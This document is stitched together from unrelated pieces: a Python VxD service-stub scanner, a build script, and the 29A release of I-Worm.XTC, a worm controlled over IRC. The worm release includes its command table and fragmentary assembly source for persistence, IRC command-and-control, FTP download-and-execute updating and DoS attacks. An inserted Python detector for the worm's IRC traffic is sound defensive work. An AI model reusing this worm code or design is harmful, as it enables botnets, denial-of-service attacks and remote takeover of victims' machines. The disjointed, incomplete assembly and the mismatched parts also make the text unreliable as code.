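JMP_FLAG = 0x80000000            # VxDJmp: dd (@@svc | 0x80000000); VxDCall leaves it clear

# VMM_Device_ID is referenced on the page; the other three are from memory (assumption).
DEVICE_NAMES: Dict[int, str] = {0x0001: "VMM", 0x0027: "VXDLDR", 0x002A: "VWIN32", 0x0040: "IFSMGR"}

# VMM ordinals exactly as listed in the winddk.inc excerpt above (partial table).
VMM_SERVICES: Dict[int, str] = {
    0x0192: "_PageOutPages", 0x0193: "_Call_On_My_Not_Flat_Stack",
    0x0196: "_AttemptingSomethingDangerous", 0x0197: "_Vsprintf",
    0x01A7: "HeapAllocateEx", 0x01AB: "_Get_CPUID_Flags",
    0x01AD: "_RegisterGARTHandler", 0x01B4: "VMMCreateThreadEx",
    0x01BD: "Query_Thread_Priority",
}


def decode_service(dword: int) -> dict:
    """Split one dynamic-link dword into jmp flag, device ID and service ordinal."""
    device = (dword >> 16) & 0x7FFF
    ordinal = dword & 0xFFFF
    return {
        "jmp": bool(dword & JMP_FLAG),
        "device": device,
        "device_name": DEVICE_NAMES.get(device, f"0x{device:04X}"),
        "ordinal": ordinal,
        "service": VMM_SERVICES.get(ordinal) if device == 0x0001 else None,
    }


def find_vxd_stubs(code: bytes) -> List[dict]:
    """Scan raw ring-0 code for `int 20h ; dd service` stubs (VxDCall/VxDJmp sites)."""
    found: List[dict] = []
    pos = code.find(DYNA_LINK_INT)
    while pos != -1 and pos + 6 <= len(code):
        (dword,) = struct.unpack_from("<I", code, pos + 2)
        rec = decode_service(dword)
        rec["offset"] = pos
        found.append(rec)
        pos = code.find(DYNA_LINK_INT, pos + 6)
    return found


# VxD_Desc_Block from vxdn.inc: Next, SDK_Version, Req_Device_Number, Major,
# Minor, Flags, Name[8], then 15 dwords from Init_Order to Reserved3 = 80 bytes.
DDB_FMT = "<IHHBBH8s15I"
DDB_SIZE = struct.calcsize(DDB_FMT)
DDB_PREV_SIG = 0x50726576          # db 'verP' read as a little-endian dword ('Prev')
DDK_VERSION = 0x0400               # assumption: Win95 DDK_VERSION
UNDEFINED_DEVICE_ID = 0xFFFF       # assumption: vmm.inc value
UNDEFINED_INIT_ORDER = 0x80000000  # assumption: vmm.inc value


def build_ddb(name: bytes, major: int, minor: int, control_proc: int,
              device_id: int = UNDEFINED_DEVICE_ID,
              init_order: int = UNDEFINED_INIT_ORDER) -> bytes:
    """Emit a DDB the way Declare_Virtual_Device does (for a hypothetical device)."""
    return struct.pack(
        DDB_FMT, 0, DDK_VERSION, device_id, major, minor, 0, name.ljust(8, b" ")[:8],
        init_order, control_proc, 0, 0, 0, 0, 0, 0, 0, 0,
        DDB_PREV_SIG, DDB_SIZE, 0x52737631, 0x52737632, 0x52737633)  # 'Rsv1'..'Rsv3'


def parse_ddb(blob: bytes, offset: int = 0) -> Optional[dict]:
    """Parse a DDB at `offset`; None unless the 'Prev' signature and DDB_Size check out."""
    if offset + DDB_SIZE > len(blob):
        return None
    f = struct.unpack_from(DDB_FMT, blob, offset)
    if f[17] != DDB_PREV_SIG or f[18] != DDB_SIZE:
        return None
    return {
        "sdk_version": f[1], "device_id": f[2], "version": (f[3], f[4]),
        "name": f[6].decode("ascii", "replace").rstrip(),
        "init_order": f[7], "control_proc": f[8],
        "service_table_ptr": f[14], "service_table_size": f[15],
    }


if __name__ == "__main__":
    sample = b"\x90\xCD\x20\x92\x01\x01\x00\xC3\xCD\x20\x01\x00\x01\x80"  # constructed
    for s in find_vxd_stubs(sample):
        print(f"+{s['offset']:04X} {'VxDJmp ' if s['jmp'] else 'VxDCall'} "
              f"{s['device_name']} ord 0x{s['ordinal']:04X} {s['service'] or ''}")
    print(parse_ddb(build_ddb(b"MYVXD", 1, 0, 0x1000)))
```

The scanner is deliberately dumb about instruction boundaries: `CD 20` can occur inside other instructions or data, so in practice you filter the hits by device ID (0 or values far above AF_MAX-style small IDs are noise) and by whether the ordinal is below Num_*_Services for that device.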
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ
@echo off
if exist v.exe del v.exe
if exist v.obj del v.obj
nasmw -f win32 v.asm
gorc /r vres.rc
alink -entry start -oPE v.obj vres.res kernel32.lib user32.lib gdi32.lib
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE.BAT]ÄÄÄ
COMMENT#
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Project XTC - I-Worm.XTC ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Have you ever thought about an internet worm you could have absolute control
over? A worm you could control, for which you could plan missions (DoS attacks,
targets to infect) that the worm then carries out? A worm which gives you access
to the infected computer, like Back Orifice? A worm you could easily control over
IRC and update over FTP? A very fast spreading worm with stealth and anti-*
features and a very small size? Have you ever thought about this? Yeah? You were
not alone. I also liked the idea, that's why I coded this worm. It can do exactly
what I wrote above. For additional information, read my article "Worms in 21st
century".
This worm was supposed to be my first one. But while I was coding this very
complex worm I got very bored with it, so meanwhile I coded I-Worm.Energy.
Before I finished it, I got many new ideaz about how my next worm should work. I
decided not to implement complex spreading via exploits (that was the main idea
of this worm), to finish it ASAP and to start work on the other one.
I finished this one. It was hard work and the result is a pretty good looking
worm :-) It is very useful to place this worm on hacked computerz, see below
why. I don't want to write a long description, I will just briefly list some of
its main featurez. Have fun!
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³             ³                                                              ³
³ Command     ³ Description                                                  ³
³             ³                                                              ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ password    ³ logs on to worm                                              ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ nopassword  ³ logs off from worm                                           ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ dos         ³ starts a DoS attack                                          ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ stopdos     ³ stops the DoS attack                                         ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ spreadon    ³ starts mail spreading                                        ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ spreadoff   ³ stops mail spreading                                         ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ spreadto    ³ sends itself to the specified e-mail address                 ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ lanspread   ³ starts LAN spreading                                         ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ reconnect   ³ terminates itself and executes itself again                  ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ exitprocess ³ terminates itself                                            ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ reboot      ³ reboots the computer                                         ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ leave       ³ cleans up and deletes itself from the infected computer      ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ update      ³ downloads a file from the specified URL and executes it      ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ ircsend     ³ runs the specified IRC command                               ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ mark        ³ payload, sets some default pagez of MSIE to                  ³
³             ³ http://www.therainforestsite.com                             ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ whois       ³ replies if the infected computer has the same IP as the      ³
³             ³ specified one                                                ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ machine     ³ retrieves the name of the infected computer                  ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ info        ³ retrieves some informationz about itself                     ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ sendme      ³ sends the specified file to the user via DCC                 ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 1, DCC SEND ³ accepts the specified file via DCC                           ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ pwd         ³ retrieves the current directory                              ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ cd          ³ changes the current directory                                ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ md          ³ creates a new directory                                      ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ rd          ³ removes the specified directory                              ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ dir         ³ lists all filenamez which match the specified mask           ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ del         ³ removes the specified file                                   ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ move        ³ moves/renames the specified file                             ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ copy        ³ copies the specified file                                    ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ exec        ³ executes the specified program                               ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Every time an IRC connection is established, the worm sends its version number
to the public window (the channel). Other wormz check it, and if their own
version number is higher they send the UPDATE command with the URL from which
they were last updated, so the whole population converges on the newest build.
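From the defender's side, the table above and the version-exchange just described are a complete wire-level signature: a fixed channel, a `!verNNNN` beacon as the first PRIVMSG after JOIN, an `update <host>` pushed by whichever peer announced the highest version, and a `password` message that has to precede every other operator verb. The Python below is an added detection example, not the worm's code and not Benny's: it walks a captured IRC session, tracks who has beaconed which version and who has logged on, and emits findings. The channel name, the beacon format and the verb list are taken from the text and the msg_* table further down; the RFC 1459 line shape and the sample log lines are constructed for the example, and the host names are documentation/invalid names.

```python
"""Flag I-Worm.XTC-style IRC command-and-control traffic in a captured session.

Added detection example for this article; not the worm's code and not Benny's.
Channel (#xtcdan), the !verNNNN beacon and the command verbs come from the text
and the msg_* table; the line format and SAMPLE_LOG are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set

C2_CHANNEL = "#xtcdan"                 # channel the worm joins ('PRIVMSG #xtcdan :!ver0001')
BEACON = re.compile(r"^!ver(\d{4})$")   # version beacon sent right after JOIN
PRIVMSG = re.compile(r"^:(?P<nick>[^!\s]+)(?:!\S+)? PRIVMSG (?P<target>\S+) :(?P<text>.*)$")
# Verbs the worm intercepts (msg_* table). Most only matter once an operator
# has logged on with 'password', so they are gated on that below.
OPERATOR_CMDS = {
    "password", "nopassword", "dos", "stopdos", "spreadon", "spreadoff", "spreadto",
    "lanspread", "reconnect", "exitprocess", "reboot", "leave", "update", "ircsend",
    "mark", "whois", "machine", "info", "sendme", "pwd", "cd", "md", "rd", "dir",
    "del", "move", "copy", "exec",
}
ALWAYS_FLAG = {"password", "update"}   # the login gate and the peer-update vector


@dataclass
class Finding:
    line_no: int
    kind: str        # beacon | update-push | operator-cmd | dcc-send
    nick: str
    detail: str


def scan_irc_log(lines: List[str]) -> List[Finding]:
    """Walk raw IRC lines and return findings in log order."""
    findings: List[Finding] = []
    versions: Dict[str, int] = {}      # nick -> version it beaconed in the C2 channel
    logged_in: Set[str] = set()        # nicks that sent 'password' (operators)
    for line_no, raw in enumerate(lines, 1):
        m = PRIVMSG.match(raw.strip())
        if not m:
            continue
        nick, target, text = m.group("nick"), m.group("target"), m.group("text")

        beacon = BEACON.match(text)
        if beacon and target.lower() == C2_CHANNEL:
            versions[nick] = int(beacon.group(1))
            findings.append(Finding(line_no, "beacon", nick, f"version {beacon.group(1)}"))
            continue

        if text.startswith("\x01DCC SEND "):   # msg_DCCRECV: the worm accepts the file
            findings.append(Finding(line_no, "dcc-send", nick, text.strip("\x01")))
            continue

        verb, _, arg = text.partition(" ")
        verb = verb.lower()
        if verb not in OPERATOR_CMDS:
            continue
        if verb == "update" and nick in versions:
            # A worm that announced a higher version pushes its last update source
            # to the lower-versioned peers (the self-update exchange in the text).
            others = [v for n, v in versions.items() if n != nick]
            if others and versions[nick] > min(others):
                findings.append(Finding(line_no, "update-push", nick,
                                        f"{arg} (ver {versions[nick]:04d} > {min(others):04d})"))
                continue
        if verb in ALWAYS_FLAG or nick in logged_in:
            findings.append(Finding(line_no, "operator-cmd", nick, text))
            if verb == "password":
                logged_in.add(nick)
            elif verb == "nopassword":
                logged_in.discard(nick)
    return findings


# Constructed sample session (documentation / .invalid host names).
SAMPLE_LOG = [
    ":w0rm123!xtc@10.0.0.5 JOIN #xtcdan",
    ":w0rm123!xtc@10.0.0.5 PRIVMSG #xtcdan :!ver0001",
    ":k9xq!xtc@10.0.0.9 PRIVMSG #xtcdan :!ver0002",
    ":k9xq!xtc@10.0.0.9 PRIVMSG #xtcdan :update ftp.example.invalid",
    ":op!op@203.0.113.7 PRIVMSG w0rm123 :password letmein",
    ":op!op@203.0.113.7 PRIVMSG w0rm123 :dos 80 victim.example.invalid",
    ":op!op@203.0.113.7 PRIVMSG w0rm123 :dir c:\\*.*",
    ":alice!a@192.0.2.3 PRIVMSG #random :dir is just a word here",
]

if __name__ == "__main__":
    for f in scan_irc_log(SAMPLE_LOG):
        print(f"{f.line_no:3d} {f.kind:13s} {f.nick:10s} {f.detail}")
```

The gating matters: `dir`, `cd` and `info` are ordinary chat words, so flagging them from any nick would bury the real hits; here they count only after that nick has sent `password`, while the beacon, the `update` push and `password` itself are flagged unconditionally because no legitimate client emits them in that shape.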
I think a longer description is not needed, the code speaks for itself. If you
have any questionz, feel free to mail me... Have fun!
ÚÄÄÄÄÄÄÄÄ¿
³ Greetz ³
ÀÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Benny / 29A ÀÄÄÄÄÄÄÄÄÄÄÄ¿
@ benny_29a@privacyx.com ³
@ http://benny29a.cjb.net ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
#
.586p
.model flat,stdcall ;standard beginning
;of win32asm code
include win32api.inc
include useful.inc
PROCESS_INFORMATION STRUCT
hProcess DWORD ?
hThread DWORD ?
dwProcessId DWORD ?
dwThreadId DWORD ?
PROCESS_INFORMATION ENDS
.data
msg_PASS db 'password ' ;commands that are intercepted
msg_NOPASS db 'nopassword' ;by worm on IRC
msg_DOS db 'dos '
msg_SPREADON db 'spreadon'
msg_SPREADOFF db 'spreadoff'
msg_RECONN db 'reconnect'
msg_EXITPROC db 'exitprocess'
msg_GETCDIR db 'pwd'
msg_SETCDIR db 'cd '
msg_DIR db 'dir'
msg_MD db 'md '
msg_RD db 'rd '
msg_DEL db 'del '
msg_MOVE db 'move '
msg_INFO db 'info'
msg_MACHINE db 'machine'
msg_DCCRECV db 1,'DCC SEND '
msg_SENDME db 'sendme '
msg_COPY db 'copy '
msg_LEAVE db 'leave'
msg_MARK db 'mark'
msg_STOPDOS db 'stopdos'
msg_IRCSEND db 'ircsend '
msg_EXEC db 'exec '
msg_WHOIS db 'whois'
msg_LAN db 'lanspread'
msg_REBOOT db 'reboot'
msg_SPREADTO db 'spreadto '
db 11h
dec_buff db 10 dup (?) ;dec->ascii conversion buffer
push 5000
call Sleep ;wait 5 secondz (5000 ms)
push 1
call SetErrorMode ;SEM_FAILCRITICALERRORS, no error dialogz
push MAX_PATH
push offset wormname2
push 0
call GetModuleFileNameA ;get worm filename
mov [wormname2_size],eax ;save the size
push edx
call Sleep ;wait a random time (EDX ms)
;this procedure can copy the worm file to system directory of Windows and
;execute it
CopyWorm Proc
mov esi,edi
mov edi,offset wormname ;copy the filename to
@copysz ;buffer
mov eax,'res\'
stosd
mov eax,'eciv'
stosd
mov eax,'xe.s'
stosd
push 'e'
pop eax
stosw ;create windir\services.exe
pop edi ;filename
push edi
push esi
mov esi,edi
@endsz
dec esi
mov edi,esi
pop esi
mov al,20h
stosb
@copysz
pop edi ;create the command line
push 0
push edi
call WinExec ;and execute worm
ret ;from system directory
CopyWorm EndP
push 10000h
push offset up_xtc+5
push esi
call OpenServiceA
xchg eax,ecx
jecxz e_scm2
push ecx
push ecx
call DeleteService ;delete service
call CloseServiceHandle
push eax
call CloseServiceHandle
e_scm1: push esi
call CloseServiceHandle ;close all opened handlez
ret
push 12345678h
wormname2_size = dword ptr $-4
push offset wormname2
push 1
push offset up_xtc+5
run_key = $+5
@pushsz 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
push 80000002h ;modify registry so
call SHSetValueA ;worm will be executed
;every start of windows
@pushsz 'Kernel32.dll'
call GetModuleHandleA ;get base address of K32
xchg eax,ecx
jecxz end_hide
@pushsz 'RegisterServiceProcess'
push ecx
call GetProcAddress ;get ptr to API
xchg eax,ecx
jecxz end_hide
push 1
push 0
call ecx ;register as service
end_hide: ;process under Win9x
ret
HideWorm EndP
mov eax,[eax+HOSTENT_IP]
mov eax,[eax]
mov [IRC_sock.sin_addr],eax
push PCL_NONE
push SOCK_STREAM
push AF_INET
call socket ;create socket
inc eax
je end_wsa
dec eax
mov [hSocket],eax ;save its handle
push sockSize
push offset IRC_sock
push [hSocket]
call connect ;connect to IRC server
inc eax
je end_irc_socket
new_nick:
call GenerateNickName ;generate random nickname
sub edi,offset nickname
add edi,5
mov ecx,edi
mov esi,offset irc_nick
call irc_send ;send the nick
test ecx,ecx
je end_irc_socket
push 14
pop ecx
mov esi,offset irc_user
call irc_send ;send user infos
test ecx,ecx
je end_irc_socket
mov ecx,1000
call irc_recv ;get server reply
test eax,eax
je end_irc_socket
inc eax
je end_irc_socket
mov ecx,esi
cmp [esi],'GNIP'
jne s_pong
mov byte ptr [esi+1],'O'
push esi
l_ping: lodsb
cmp al,0Ah
jne l_ping
sub ecx,esi
neg ecx
pop esi
call irc_send ;send PONG! if PING?
push 19
pop ecx
mov esi,offset irc_join
call irc_send ;send the JOIN command
jecxz end_irc_socket
push 22
pop ecx
mov esi,offset irc_mode1
call irc_send ;set channel modez
jecxz end_irc_socket
push 17
pop ecx
mov esi,offset irc_mode2
call irc_send ;--- "" ---
jecxz end_irc_socket
mov ecx,300h
call irc_recv ;get server reply
test eax,eax
je end_irc_socket
inc eax
je end_irc_socket
and [password_passed],0 ;no superuser logged yet
call @lupd
db 'PRIVMSG #xtcdan :!ver0001',0dh,0ah
@lupd: pop esi
push 27
pop ecx
call irc_send ;send worms version code
inc eax
je end_irc_socket
end_irc_socket:
push 12345678h
hSocket = dword ptr $-4
call closesocket ;close connection
end_wsa:call WSACleanup ;clean up
end_irc_man:
irc_RECONN:
ret
IRCConnect EndP
irc_manage_pop:
pop esi
;this procedure can analyse IRC commandz and make the proper actionz
irc_manage Proc
call GetTickCount ;get the time
xchg eax,ebp
call irc_recv_100h ;get IRC reply
push eax
call GetTickCount ;get the time
xchg eax,ecx
pop eax
test eax,eax
je end_irc_man
inc eax
je end_irc_socket
sub ecx,ebp
cmp ecx,5*60000
jb no_idle ;quit if nothing
ret ;happened in 5 minutez
no_idle:cmp [esi],'GNIP'
je do_pong ;make the PONG! reply
inc esi ;if needed
push esi
@endspc
cmp [esi],'VIRP'
jne irc_manage_pop
cmp [esi+4],2047534Dh ;quit if it's not the PRIVMSG
jne irc_manage_pop ;command
push 9
pop ecx
mov edi,offset irc_tmp
mov edx,edi
movsd
movsd ;copy the first part
pop esi ;of the command
cmp [esi],'adpu'
jne @m_nx0
cmp word ptr [esi+4],'et'
jne @m_nx0
cmp byte ptr [esi+6],20h
je irc_UPDATE ;update worm if the
;command has been sent
@m_nx0: cmp [esi],'rev!' ;version querying?
jne @m_next
cmp [esi+4],'1000'
jb @m_n
jmp @m_next ;continue
call @m_h
dd 100
@m_h: push edi
call @m_o
dd 1
@m_o: @pushsz 'XTCUpdate'
push offset up_path
push 80000002h
call SHGetValueA ;get the FTP address
pop esi ;from registry
pop ecx
@l_up2: lodsb
inc ecx
test al,al
jne @l_up2
dec esi
mov edi,esi
mov ax,0A0Dh
stosw
inc ecx
inc ecx
pop esi
call irc_send ;send it!
jmp irc_manage
push esi
@endspc
mov byte ptr [esi-1],0
push esi
@endspc
mov byte ptr [esi-1],0
push esi
@endbr
mov byte ptr [esi-1],0
xor eax,eax
push eax
push eax
push eax
push eax
@pushsz 'XTC'
call InternetOpenA ;create the inet handle
test eax,eax
je err_up0
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
call InternetCheckConnectionA ;check if we are already
xchg eax,ecx ;connected to inet
jecxz err_up1 ;quit if not
xor eax,eax
push eax
push eax
push 1
push eax
push eax
push 21
push dword ptr [esp+8+6*4]
push ebx
call InternetConnectA ;connect to FTP server
test eax,eax
je err_up1
xchg eax,ebp
push 0
push 2
push FILE_ATTRIBUTE_NORMAL
push 0
@pushsz 'xtcspawn.exe'
pop edi
push edi
push dword ptr [esp+5*4]
push ebp
call FtpGetFileA ;download the worm
xchg eax,ecx
jecxz err_up2
push 0
push edi
call WinExec ;execute it
jmp end_worm
err_up2:push ebp
call InternetCloseHandle
err_up1:push ebx
call InternetCloseHandle ;close all inet handlez
err_up0:pop eax
pop eax
pop eax
popad
jmp irc_manage
;DOS attack
irc_DOS:pushad
@SEH_SetupFrame <jmp err_dos>
@endspc ;get over the command
call Ascii2Num
push eax
call htons
mov [DOS_sock.sin_port],ax ;save the port number
inc esi
push esi ;ESI = server name (*)
@endbr
mov byte ptr [esi-1],0
call gethostbyname ;*
test eax,eax
je err_dos
mov eax,[eax+HOSTENT_IP]
mov eax,[eax]
mov [DOS_sock.sin_addr],eax ;save the IP
mov [dos_sem],eax
